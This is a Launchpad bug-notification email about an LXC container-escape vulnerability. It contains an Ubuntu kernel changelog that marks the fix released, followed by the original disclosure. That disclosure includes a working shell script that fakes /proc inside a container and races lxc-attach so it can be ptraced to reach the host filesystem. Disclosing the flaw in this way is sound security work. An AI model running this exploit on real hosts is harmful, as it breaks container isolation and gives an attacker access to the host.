This bug was fixed in the package linux - 3.19.0-75.83
---------------
linux (3.19.0-75.83) vivid; urgency=low
[ Luis Henriques ]
* Release Tracking Bug
- LP: #1640613
* lxc-attach to malicious container allows access to host (LP: #1639345)
- Revert "UBUNTU: ptrace: being capable wrt a process requires mapped
uids/gids"
- (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission
checks
* CVE-2016-8658
- brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap()
* CVE-2016-7425
- scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer()
-- Luis Henriques <luis.henriq...@canonical.com> Wed, 09 Nov 2016
22:48:56 +0000
** Changed in: linux (Ubuntu Vivid)
Status: Fix Committed => Fix Released
** Changed in: linux (Ubuntu Xenial)
Status: Fix Committed => Fix Released
--
You received this bug notification because you are a member of Kernel
Packages, which is subscribed to linux in Ubuntu.
https://bugs.launchpad.net/bugs/1639345
Title:
lxc-attach to malicious container allows access to host
Status in linux package in Ubuntu:
Triaged
Status in lxc package in Ubuntu:
Fix Released
Status in linux source package in Trusty:
Fix Released
Status in lxc source package in Trusty:
Fix Released
Status in linux source package in Vivid:
Fix Released
Status in lxc source package in Vivid:
Fix Released
Status in linux source package in Xenial:
Fix Released
Status in lxc source package in Xenial:
Fix Released
Status in linux source package in Yakkety:
Fix Released
Status in lxc source package in Yakkety:
Fix Released
Bug description:
A malicious root user in an unprivileged container may interfere with
lxc-attach to provide manipulated guest proc file system information
to disable dropping of capabilities and may in the end access the host
file system by winning a very easy race against lxc-attach.
In guest sequence:
cat <<EOF > /tmp/test
#!/bin/bash -e
rm -rf /test || true
mkdir -p /test/sys/kernel
echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts
echo 0 > /test/sys/kernel/cap_last_cap
mkdir -p /test/self
mknod /test/self/status p
cd /proc
mount -o bind /test /proc
while true; do
pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe
->.*/\\1/')
if [ "\${pid}" != "" ]; then
cd /
umount -i -f -l -n /proc
exec /LxcAttachEscape "\${pid}" /bin/bash
fi
sleep 1
done
EOF
See attachment for LxcAttachEscape.c
Exploit uses fixed fd=7 for attacking, on other test environment, it
might be other fd. Tests were performed by attacking lxc-attach
started by
screen lxc-attach -n [guestname]
which is the sequence required against the TTY-stealing attacks also
not fixed in all lxc-attach versions.
In my opinion two bugs might need fixing:
* lxc-attach should not use untrusted/manipulated information for proceeding
* kernel should prevent against ptracing of lxc-attach as it was created in
another USERNS
# lsb_release -r -d
Description: Ubuntu 16.04.1 LTS
Release: 16.04
# apt-cache policy lxc1
lxc1:
Installed: 2.0.5-0ubuntu1~ubuntu16.04.2
Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2
Version table:
*** 2.0.5-0ubuntu1~ubuntu16.04.2 500
500 http://debarchive-ehealth.d03.arc.local/ubuntu
xenial-updates/main amd64 Packages
100 /var/lib/dpkg/status
2.0.0-0ubuntu2 500
500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64
Packages
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions
--
Mailing list: https://launchpad.net/~kernel-packages
Post to : kernel-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~kernel-packages
More help : https://help.launchpad.net/ListHelp
